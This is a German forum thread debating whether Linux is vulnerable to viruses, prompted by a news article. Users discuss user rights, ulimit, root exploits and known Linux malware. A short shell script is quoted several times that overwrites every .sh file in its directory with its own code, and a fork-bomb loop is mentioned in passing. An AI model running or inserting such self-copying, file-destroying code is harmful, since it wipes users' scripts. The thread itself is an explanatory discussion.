Hallo,

ich habe folgenden Artikel durchgelesen und frage mich irgendwie, ob man das alles glauben kann oder nicht?

http://www.freenet.de/freenet/computer/betriebssysteme/linux/linux_viren/index.html

Meiner meinung nach liest man da schon ein bisschen Panikmache raus.
Und was soll die Aussage: Die Virenscanner erkennen nocht nicht alle Viren unter Linux?

Würde gerne mal die Meinung anderer dazu hören/lesen?


Gruss

CaptainIglu

#!/bin/sh
#Dieser Virus ist nur für Lehrzwecke gedacht !
#Das Verbreiten von Viren ist strafbar!
for file in *.sh
do
head -n 7 $0 > $file
done


1. das ist kein virus, sonst wäre ein while(1) { fork(); } auch schon ein virus. http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci213306,00.html

2. alles eine frage der benutzerrechte und beschränkungen (sprich: ulimit)

Meiner meinung nach liest man da schon ein bisschen Panikmache raus. Nein, das fällt meiner Mainung nach noch eindeutig unter "völlig normale und notwendige Paranoia"


Und was soll die Aussage: Die Virenscanner erkennen nocht nicht alle Viren unter Linux? Welcher Virenscanner erkennt schon alle Schadprogrogramme? Schreib heute eins, und es wird frühestens morgen von Virenscannern erkannt werden können.

Hi@all

Es war schon lange bekannt, dass es auch Vieren für Linux gibt. Nur lassen sich diese auf Grund eines viel besseren Rechtesystems als unter Windows besser in ihrem Schadensumfang beschneiden. Ein System ist nur so sicher wie man es konfiguriert und wartet.

Cu
André

welchen Linux Virus gibt denn denn?

wie schon gesagt, es sind die rechte und beschränkungen die linux sicher machen.
bei windows ist es kein problem sich einfach einzuloggen, du hast kompletten zugriff (danak der vielen administratoren die auf ein admin kennwort verzichten). außerdem kenne ich keine möglichkeit irgendwelche user limits zu machen. bei linux sieht das ganz anders aus. wobei auch hier das problem besteht, als root ausgeführt darf ein programm auch alles.

als root ausgeführt darf ein programm auch alles.

Da setzen neuere Viren an und versuchen root durch bestimmte Exploits zu bekommen.

Also muss man sich nur vor rootkits schützen, da ein Virus ja nur nen dummes Shellscript sein kann.

Original geschrieben von NoEx
Da setzen neuere Viren an und versuchen root durch bestimmte Exploits zu bekommen.

genau da kommt es wieder auf den user an!

wenn man einmal in der woche die update funktion einer beliebigen distribution startet, wird auch hier das risiko stark verringert.

Wieso kann ein Virus nur ein dummes Shellscript sein? So wie ich das sehe, ist der einzige (grobe!) Unterschied zwischen Windows und Linux das es unter letzgenanntem halt Rechte gibt. Wenn du als noneroot ein infiziertes Programm hast, und das dann doch mal als root ausführst kann sich Virus genau wie unter Windows verbreiten.

Dann fürs halt nicht als root aus :ugly:

so ein schwachsinn :mad:

Schwachsinn? Was ist mit funktionstüchtigen Viren wie Staog (der 3 verschiedene Exploits benutzt um root zu bekommen), fuzz oder snoopy?
Wenn man schädliche Programme in Scriptsprachen wie Perl noch hinzunimmt, kommt schon eine kleine Liste zusammen.

Natürlich funktionieren die ELF Infektoren nicht unter jeder beliebigen Distribution, und das ist der einzige Grund warum Viren unter Linux/Unix sich nicht verbreiten, abgesehen von Würmern ...

Es gibt einfach kein OS was wirklich sicher ist.

Original geschrieben von Thomas Mitzkat
so ein schwachsinn :mad:

Klasse post! Trink ruhig deinen Kaffee weiter, anstatt sinnvolles zu schreiben, wie ich grad eben.
Oh je, ich hab (noch) keinen Pokal, hoffentlich gibt´s keine Haue.

Original geschrieben von benito
Klasse post! Trink ruhig deinen Kaffee weiter, anstatt sinnvolles zu schreiben, wie ich grad eben.
Oh je, ich hab (noch) keinen Pokal, hoffentlich gibt´s keine Haue. Nun mal ruhig Blut. Anstatt den selben Fehler zu machen, provozieren, solltest du einfach deine Buddy Liste mal updaten.

Cu
André

Hi Berufspenner (geiler Name übrigends;))
hast ja recht -> hier meine offizielle Entschuldigung ----> SORRY!
Buddyliste wird upgedated!
CU
benito

#!/bin/sh
#Dieser Virus ist nur für Lehrzwecke gedacht !
#Das Verbreiten von Viren ist strafbar!
for file in *.sh
do
head -n 7 $0 > $file
done

so ein beispiel ist auch schwachsinn und nimmt der diskussion jegliche grundlage.


hier meine offizielle Entschuldigung ----> SORRY!
akzeptiert - hätte auch nicht angenommen, dass du dich unter das niveau dieses beispiels begibst :)

ok, das Shellscript, wenn man es so bezeichnen will, ist wirklich ´n bisschen
hirnverbrannt... wollte auch nicht jemanden mit so vielen posts an´s Bein
pissen...;)
CU
b

#!/bin/sh
#Dieser Virus ist nur für Lehrzwecke gedacht !
#Das Verbreiten von Viren ist strafbar!
for file in *.sh
do
head -n 7 $0 > $file
done


und kann mir bitte jemand sahen was dieses skript bewirken soll oder tut ???

ich möchte es beileid nicht ausprobieren *smile* will kein virus

grüsse

bullet4one

das script schreibt sich selbst ($0) (7 zeilen) in jede im verzeichnis liegende datei, die mit "*.sh" aufhört.

@alexm
Natürlich ist dieses Shellscript ein Virus, denn es verfügt über die existenzielle (Virus) Funktion: Weiterverbreitung.

Der von dir genannte Link enthält eine Definition die ich persönlich für falsch halte, denn dort wird Weiterverbreitung als "optional" beschrieben und die Schadensroutine als notwendig. Es ist eigentlich genau umgekehrt.

Ein Virus der sich nicht verbreitet ist IMO ein Widerspruch in sich, die Viren-FAQ (http://www.vhm.haitec.de/faq/faq-kap2.htm#K2.3) beschreibt es treffend.

HTH

ansichtssache, dem ding fehlt die verbreitung übers netzwerk

Zum gefahrlosen Testen:
Ein paar *.sh nach /media/floppy kopieren und mit nachfolgender
geänderten Zeile starten: for file in /media/floppy/*.sh

Die Sachdarstellung der verlinkten Seite ist gründlich recherchiert.
Doch was will der Autor uns damit sagen?

-Aufklärung für die Erfahrenen? Die kennen dieses Risiko ohnehin und werden Software
nur aus vertrauenswürdigen Quellen beziehen sowie ggf. die Funktionsweise von
Fremd-Scripten hinterfragen.

-Als Warnung an unbedarfte Linux-Neueinsteiger 'Auch Linux ist virusgefährdet!'?
Da Freenet eine Massenseite ist, ist dies eher wahrscheinlich. Doch da die
Sachdarstellung viel Wissen voraussetzt, wird eher Verwirrung/Furcht erzeugt
"Dann kann ich auch bei Windows bleiben, da kenne ich mich aus.."
Also nur verunglückte Aufbereitung oder ein weiterer MS-Beeinflussungsagent? :D